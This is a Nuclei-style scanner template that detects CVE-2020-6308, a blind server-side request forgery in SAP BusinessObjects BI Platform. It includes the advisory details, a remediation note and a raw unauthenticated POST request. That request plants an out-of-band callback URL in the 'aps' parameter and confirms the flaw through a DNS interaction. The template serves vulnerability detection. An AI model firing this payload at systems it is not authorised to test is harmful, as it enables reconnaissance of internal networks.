id: CVE-2020-6308 info: name: SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery author: madrobot severity: medium description: | SAP BusinessObjects Business Intelligence Platform (Web Services) 410, 420, and 430 is susceptible to blind server-side request forgery. An attacker can inject arbitrary values as CMS parameters to perform lookups on the internal network, which is otherwise not accessible externally. On successful exploitation, attacker can scan network to determine infrastructure and gather information for further attacks like remote file inclusion, retrieving server files, bypassing firewall, and forcing malicious requests. remediation: | Apply the relevant security patches provided by SAP to mitigate this vulnerability. reference: - https://github.com/InitRoot/CVE-2020-6308-PoC - https://launchpad.support.sap.com/#/notes/2943844 - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=558632196 - https://nvd.nist.gov/vuln/detail/CVE-2020-6308 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-6308 cwe-id: CWE-918 epss-score: 0.00306 epss-percentile: 0.66005 cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:4.1:-:*:*:*:*:*:* metadata: max-request: 1 vendor: sap product: businessobjects_business_intelligence_platform tags: cve,cve2020,sap,ssrf,oast,unauth http: - raw: - | POST /AdminTools/querybuilder/logon?framework= HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded aps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: word part: location words: - "{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"